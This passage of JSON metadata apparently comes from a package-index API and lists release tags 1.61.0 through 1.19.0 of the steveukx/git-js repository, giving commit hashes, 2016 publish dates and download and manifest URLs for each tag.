0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.61.0/manifests"},{"name":"1.60.0","sha":"529138ba90c1c6ccfabaf0fdf325889ed2910856","kind":"tag","published_at":"2016-11-05T08:16:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.60.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.60.0/manifests"},{"name":"1.59.0","sha":"07f34d65a2670c5770d47cf943922512b2f4f73e","kind":"tag","published_at":"2016-10-29T08:16:57.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.59.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.59.0/manifests"},{"name":"1.58.0","sha":"dd716de146be0929498863987bee1330b5eacc87","kind":"tag","published_at":"2016-10-29T07:22:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.58.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.58.0/manifests"},{"name":"1.57.0","sha":"ad55fc4a2d2df38d0fd456efedec4fb32bdd0845","kind":"tag","published_at":"2016-10-26T19:08:21.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.57.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.57.0/manifests"},{"name":"1.56.0","sha":"4dec03447a4585dcb7d80cc955751eb4ba4e027a","kind":"tag","published_at":"2016-10-23T10:29:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.56.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.56.0/manifests"},{"name":"1.55.0","sha":"5c7bfa1aafd2246ccfac7adce65479c2476ac9bc","kind":"tag","published_at":"2016-10-22T07:52:18.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.55.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.55.0/manifests"},{"name":"1.54.0","sha":"9a8066353209ccebed08db9c13dd9d9cb6ae9e40","kind":"tag","published_at":"2016-10-08T08:36:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.54.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.54.0/manifests"},{"name":"1.53.0","sha":"1f85addda7e998fba2e76c1085e0dd0171294fed","kind":"tag","published_at":"2016-09-30T20:11:23.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.53.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.53.0/manifests"},{"name":"1.52.0","sha":"4bcf9fca3b05d4625de5a88c57107989fae8a621","kind":"tag","published_at":"2016-09-29T07:50:44.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.52.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.52.0/manifests"},{"name":"1.51.0","sha":"cda91526a2b818deee621032d75dcc1071cdc91c","kind":"tag","published_at":"2016-09-24T11:26:11.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.51.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.51.0/manifests"},{"name":"1.50.0","sha":"8b2902189cceb1a9afc74dc04210591158b29a58","kind":"tag","published_at":"2016-09-18T15:43:33.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.50.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.50.0/manifests"},{"name":"1.49.0","sha":"d50770286a3aaacdc292cb32667c82ed81d02839","kind":"tag","published_at":"2016-09-18T15:11:45.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.49.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.49.0/manifests"},{"name":"1.48.0","sha":"feb285261b466ae79819f92bc82e410ad7fa3c3e","kind":"tag","published_at":"2016-08-26T20:11:01.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.48.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.48.0/manifests"},{"name":"1.47.0","sha":"b8e41f2a6e5803a864622e1170ca0f554c96803f","kind":"tag","published_at":"2016-08-13T08:55:18.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.47.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.47.0/manifests"},{"name":"1.46.0","sha":"40f8e15fcffff777c0b1d302174f1ec47e41647d","kind":"tag","published_at":"2016-08-13T08:36:47.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.46.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.46.0/manifests"},{"name":"1.45.0","sha":"3cc8f065225321c8f6e1a31ae1ce6c7673034bc0","kind":"tag","published_at":"2016-08-04T21:14:36.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.45.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.45.0/manifests"},{"name":"1.44.0","sha":"c32a9ac0670589ebe195822c686dc1549c026d71","kind":"tag","published_at":"2016-07-30T10:01:12.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.44.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.44.0/manifests"},{"name":"1.43.0","sha":"859c726ca15bdb235b7dd669468f1e3567bba187","kind":"tag","published_at":"2016-07-16T06:03:30.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.43.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.43.0/manifests"},{"name":"1.42.1","sha":"5f4fbe31ffebde32bcddc268826c7e524109068f","kind":"tag","published_at":"2016-07-13T19:14:33.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.42.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.42.1/manifests"},{"name":"1.42.0","sha":"d5b59c181d9001ab8183292a6643ed57ddc10121","kind":"tag","published_at":"2016-07-13T19:12:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.42.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.42.0/manifests"},{"name":"1.41.0","sha":"0d06b329d86b68526037b5a2f79697998c9bf06d","kind":"tag","published_at":"2016-07-09T07:12:13.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.41.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.41.0/manifests"},{"name":"1.40.0","sha":"154e1f1976321fd3e679d3a71fdd83a702c10106","kind":"tag","published_at":"2016-06-28T20:53:52.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.40.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.40.0/manifests"},{"name":"1.39.0","sha":"990d04991b8df12c0e46ae6a4a16fbba8aa9fcee","kind":"tag","published_at":"2016-06-28T20:52:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.39.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.39.0/manifests"},{"name":"1.38.0","sha":"8f298b9acdfdbfb6cb1d7740335e1bb0d60e9190","kind":"tag","published_at":"2016-06-19T18:47:31.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.38.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.38.0/manifests"},{"name":"1.37.0","sha":"08affdb71da31fb38e28cc3a3eaf9cc782d4d97c","kind":"tag","published_at":"2016-06-04T12:05:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.37.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.37.0/manifests"},{"name":"1.36.0","sha":"14cb0dd2d4187155e15136032ff1bb852b297bc3","kind":"tag","published_at":"2016-06-04T11:58:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.36.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.36.0/manifests"},{"name":"1.35.0","sha":"3050a165e8f716e3c8c6e5ccd7b30872687090dd","kind":"tag","published_at":"2016-05-18T21:12:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.35.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.35.0/manifests"},{"name":"1.34.0","sha":"72434cb707dfd7fb7d754f592fc04709328969d8","kind":"tag","published_at":"2016-05-18T20:59:10.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.34.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.34.0/manifests"},{"name":"1.33.1","sha":"1d6f2ca87654fa9062e253ce913bdb030fd8be81","kind":"tag","published_at":"2016-05-16T19:27:20.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.33.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.33.1/manifests"},{"name":"1.33.0","sha":"2fcd8588b2b07c761e867274ff8f8f77661fb820","kind":"tag","published_at":"2016-05-16T19:25:19.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.33.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.33.0/manifests"},{"name":"1.32.1","sha":"bc5706e46a97379d388c4dcd03f8882ba3ad5ac5","kind":"tag","published_at":"2016-04-17T18:56:48.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.32.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.32.1/manifests"},{"name":"1.32.0","sha":"034e18568518b4ed8088215aa40139d47f0bf366","kind":"tag","published_at":"2016-04-09T10:57:19.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.32.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.32.0/manifests"},{"name":"1.31.1","sha":"d98e920bfa9ed8d875552dc27fe7359de0f95885","kind":"tag","published_at":"2016-04-05T18:56:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.31.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.31.1/manifests"},{"name":"1.31.0","sha":"01e22857ad43707b4d2c64d1e259288e5193ef69","kind":"tag","published_at":"2016-03-21T13:47:26.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.31.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.31.0/manifests"},{"name":"1.30.0","sha":"a4aaf7d7ec551f5dd7b0b5b15461f5d2283f03de","kind":"tag","published_at":"2016-03-21T13:09:35.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.30.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.30.0/manifests"},{"name":"1.29.0","sha":"b7eb0d0966fc0bdda16a76cc1abf9abe747d0f13","kind":"tag","published_at":"2016-03-19T14:36:15.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.29.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.29.0/manifests"},{"name":"1.28.1","sha":"4fc7f7ff52ed825f1f7e13b781ca60543c55997b","kind":"tag","published_at":"2016-03-11T06:43:07.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.28.1","html_url":"https://github.com/steveukx/git-js/releases/tag/1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.28.1/manifests"},{"name":"1.28.0","sha":"ce861ef8e25973cc6c54ecbe7f158612d30cd829","kind":"tag","published_at":"2016-03-07T19:30:45.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.28.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.28.0/manifests"},{"name":"1.27.0","sha":"5e03f930c7d9207eba217b44d17953c96463fdf1","kind":"tag","published_at":"2016-03-03T21:52:33.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.27.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.27.0/manifests"},{"name":"1.26.2","sha":"f36bb4e4a75f0ace02ce31a2594d4d8fec0ad21b","kind":"tag","published_at":"2016-02-27T09:07:23.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.26.2","html_url":"https://github.com/steveukx/git-js/releases/tag/1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.26.2/manifests"},{"name":"1.26.0","sha":"53b9f1dd912746cc6459418b52f83fc9de3ffb6f","kind":"tag","published_at":"2016-02-22T15:15:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.26.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.26.0/manifests"},{"name":"1.25.0","sha":"0565788df8533d18df48de7ee465040b300fa89d","kind":"tag","published_at":"2016-02-20T08:07:17.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.25.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.25.0/manifests"},{"name":"1.24.0","sha":"b657c03113d9061071751800834b98fefa6524ab","kind":"tag","published_at":"2016-02-13T17:48:02.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.24.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.24.0/manifests"},{"name":"1.23.0","sha":"e1d0be9e12a7593eda5c6695ee7f5dfd9bc492ce","kind":"tag","published_at":"2016-02-13T17:28:22.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.23.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.23.0/manifests"},{"name":"1.22.0","sha":"78a15a127a7dbb3329c70d6b036bba57aa8bca26","kind":"tag","published_at":"2016-02-02T14:47:34.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.22.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.22.0/manifests"},{"name":"1.21.0","sha":"8e62ea0edd7533bdc77dc08cbff05a57706d62b1","kind":"tag","published_at":"2016-01-04T18:59:24.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.21.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.21.0/manifests"},{"name":"1.20.0","sha":"d4bdd0c823584519ddd70f8eceb8ff06c0d72324","kind":"tag","published_at":"2016-01-03T16:02:18.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/1.20.0","html_url":"https://github.com/steveukx/git-js/releases/tag/1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/1.20.0/manifests"},{"name":"1.19.0","sha":"f005d42cb8fe29b749a737066ae0681148414039","kind":"tag","published_at